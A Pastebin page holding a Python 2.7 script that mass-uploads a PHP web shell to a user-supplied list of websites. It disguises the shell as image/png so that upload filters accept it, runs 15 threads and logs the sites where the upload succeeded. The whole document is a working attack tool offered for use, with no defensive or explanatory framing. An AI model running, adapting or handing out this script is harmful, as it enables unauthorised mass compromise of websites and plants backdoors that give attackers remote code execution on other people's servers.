Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- import warnings
- import urlparse
- from colorama import Fore
- from requests.packages.urllib3.exceptions import InsecureRequestWarning
- from time import time as timer
- from multiprocessing.dummy import Pool as ThreadPool
- warnings.simplefilter('ignore',InsecureRequestWarning)
- # build with python2.7 ! bypass image file upload by changing Content-Type header of the PHP files to image/png (at lines 34)
- inputLIST = raw_input('Input Your List : ')
- try:
- with open(inputLIST, 'r') as file:
- read = file.read().splitlines()
- except IOError:
- pass
- dom = list((read))
- # example : Filedata, userfile, qqfile, etc.
- inputPARAM = raw_input('POST File Parameter : ')
- # text result output after/if file uploaded
- inputRESULT = raw_input('Output Text if Uploaded (just leave it blank if u dont want to set any) : ')
- # Your PHP WebShell File Name
- SHELLname = raw_input('Your Shell Name : ')
- fr = Fore.RED
- fg = Fore.GREEN
- fy = Fore.YELLOW
- headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
- def csrf(url):
- try:
- paramUpload = [(inputPARAM, (SHELLname, open(SHELLname, 'rb'), 'image/png'))]
- DOupload2 = requests.post(url, files=paramUpload, verify=False, headers=headers, timeout=10)
- if inputRESULT in DOupload2.content:
- print('{}====Success Upload==== : {}').format(fg,url)
- print(fy+DOupload2.text)
- with open('result/RESULT-SHELL.txt', 'a') as writer:
- writer.write(url + '\n' + DOupload2.text + '\n\n\n')
- else:
- print('{}====Failed Upload! Not Vulnerable!==== : {}').format(fr,url)
- except:
- pass
- def runner(url):
- try:
- csrf(url)
- except Exception as e:
- print(e)
- def Main():
- try:
- start = timer()
- tp = ThreadPool(15)
- go = tp.map(runner, dom)
- except:
- pass
- if __name__ == '__main__':
- Main()
Add Comment
Please, Sign In to add comment